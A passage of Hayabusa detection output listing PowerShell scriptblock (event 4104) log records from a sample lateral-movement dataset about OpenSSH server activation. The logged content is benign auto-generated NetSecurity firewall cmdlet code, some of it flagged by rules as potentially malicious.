[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByName')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { 
[object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 